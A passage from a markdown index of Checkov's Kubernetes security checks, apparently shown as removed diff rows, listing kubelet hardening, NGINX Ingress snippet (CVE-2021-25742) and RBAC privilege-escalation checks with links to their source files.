[KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3371 | CKV_K8S_140 | resource | Deployment | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3372 | CKV_K8S_140 | resource | DeploymentConfig | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3373 | CKV_K8S_140 | resource | Job | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3374 | CKV_K8S_140 | resource | Pod | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3375 | CKV_K8S_140 | resource | PodTemplate | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3376 | CKV_K8S_140 | resource | ReplicaSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3377 | CKV_K8S_140 | resource | ReplicationController | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3378 | CKV_K8S_140 | resource | StatefulSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3379 | CKV_K8S_141 | resource | CronJob | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3380 | CKV_K8S_141 | resource | DaemonSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3381 | CKV_K8S_141 | resource | Deployment | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3382 | CKV_K8S_141 | resource | DeploymentConfig | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3383 | CKV_K8S_141 | resource | Job | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3384 | CKV_K8S_141 | resource | Pod | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3385 | CKV_K8S_141 | resource | PodTemplate | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3386 | CKV_K8S_141 | resource | ReplicaSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3387 | CKV_K8S_141 | resource | ReplicationController | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3388 | CKV_K8S_141 | resource | StatefulSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) | -| 3389 | CKV_K8S_143 | resource | CronJob | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3390 | CKV_K8S_143 | resource | DaemonSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3391 | CKV_K8S_143 | resource | Deployment | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3392 | CKV_K8S_143 | resource | DeploymentConfig | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3393 | CKV_K8S_143 | resource | Job | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3394 | CKV_K8S_143 | resource | Pod | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3395 | CKV_K8S_143 | resource | PodTemplate | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3396 | CKV_K8S_143 | resource | ReplicaSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3397 | CKV_K8S_143 | resource | ReplicationController | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3398 | CKV_K8S_143 | resource | StatefulSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | -| 3399 | CKV_K8S_144 | resource | CronJob | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3400 | CKV_K8S_144 | resource | DaemonSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3401 | CKV_K8S_144 | resource | Deployment | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3402 | CKV_K8S_144 | resource | DeploymentConfig | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3403 | CKV_K8S_144 | resource | Job | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3404 | CKV_K8S_144 | resource | Pod | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3405 | CKV_K8S_144 | resource | PodTemplate | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3406 | CKV_K8S_144 | resource | ReplicaSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3407 | CKV_K8S_144 | resource | ReplicationController | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3408 | CKV_K8S_144 | resource | StatefulSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | -| 3409 | CKV_K8S_145 | resource | CronJob | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3410 | CKV_K8S_145 | resource | DaemonSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3411 | CKV_K8S_145 | resource | Deployment | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3412 | CKV_K8S_145 | resource | DeploymentConfig | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3413 | CKV_K8S_145 | resource | Job | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3414 | CKV_K8S_145 | resource | Pod | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3415 | CKV_K8S_145 | resource | PodTemplate | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3416 | CKV_K8S_145 | resource | ReplicaSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3417 | CKV_K8S_145 | resource | ReplicationController | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3418 | CKV_K8S_145 | resource | StatefulSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | -| 3419 | CKV_K8S_146 | resource | CronJob | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3420 | CKV_K8S_146 | resource | DaemonSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3421 | CKV_K8S_146 | resource | Deployment | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3422 | CKV_K8S_146 | resource | DeploymentConfig | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3423 | CKV_K8S_146 | resource | Job | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3424 | CKV_K8S_146 | resource | Pod | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3425 | CKV_K8S_146 | resource | PodTemplate | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3426 | CKV_K8S_146 | resource | ReplicaSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3427 | CKV_K8S_146 | resource | ReplicationController | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3428 | CKV_K8S_146 | resource | StatefulSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | -| 3429 | CKV_K8S_147 | resource | CronJob | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3430 | CKV_K8S_147 | resource | DaemonSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3431 | CKV_K8S_147 | resource | Deployment | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3432 | CKV_K8S_147 | resource | DeploymentConfig | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3433 | CKV_K8S_147 | resource | Job | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3434 | CKV_K8S_147 | resource | Pod | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3435 | CKV_K8S_147 | resource | PodTemplate | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3436 | CKV_K8S_147 | resource | ReplicaSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3437 | CKV_K8S_147 | resource | ReplicationController | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3438 | CKV_K8S_147 | resource | StatefulSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | -| 3439 | CKV_K8S_148 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3440 | CKV_K8S_148 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3441 | CKV_K8S_148 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3442 | CKV_K8S_148 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3443 | CKV_K8S_148 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3444 | CKV_K8S_148 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3445 | CKV_K8S_148 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3446 | CKV_K8S_148 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3447 | CKV_K8S_148 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3448 | CKV_K8S_148 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | -| 3449 | CKV_K8S_149 | resource | CronJob | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3450 | CKV_K8S_149 | resource | DaemonSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3451 | CKV_K8S_149 | resource | Deployment | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3452 | CKV_K8S_149 | resource | DeploymentConfig | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3453 | CKV_K8S_149 | resource | Job | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3454 | CKV_K8S_149 | resource | Pod | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3455 | CKV_K8S_149 | resource | PodTemplate | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3456 | CKV_K8S_149 | resource | ReplicaSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3457 | CKV_K8S_149 | resource | ReplicationController | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3458 | CKV_K8S_149 | resource | StatefulSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | -| 3459 | CKV_K8S_151 | resource | CronJob | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3460 | CKV_K8S_151 | resource | DaemonSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3461 | CKV_K8S_151 | resource | Deployment | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3462 | CKV_K8S_151 | resource | DeploymentConfig | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3463 | CKV_K8S_151 | resource | Job | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3464 | CKV_K8S_151 | resource | Pod | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3465 | CKV_K8S_151 | resource | PodTemplate | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3466 | CKV_K8S_151 | resource | ReplicaSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3467 | CKV_K8S_151 | resource | ReplicationController | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3468 | CKV_K8S_151 | resource | StatefulSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | -| 3469 | CKV_K8S_152 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py) | -| 3470 | CKV_K8S_153 | resource | Ingress | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py) | -| 3471 | CKV_K8S_154 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py) | -| 3472 | CKV_K8S_155 | resource | ClusterRole | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations | Kubernetes | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py) | -| 3473 | CKV_K8S_156 | resource | ClusterRole | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests | Kubernetes | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py) | -| 3474 | CKV_K8S_157 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | -| 3475 | CKV_K8S_157 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | -| 3476 | CKV_K8S_158 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | -| 3477 | CKV_K8S_158 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | -| 3478 | CKV2_K8S_1 | resource | ClusterRole | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | -| 3479 | 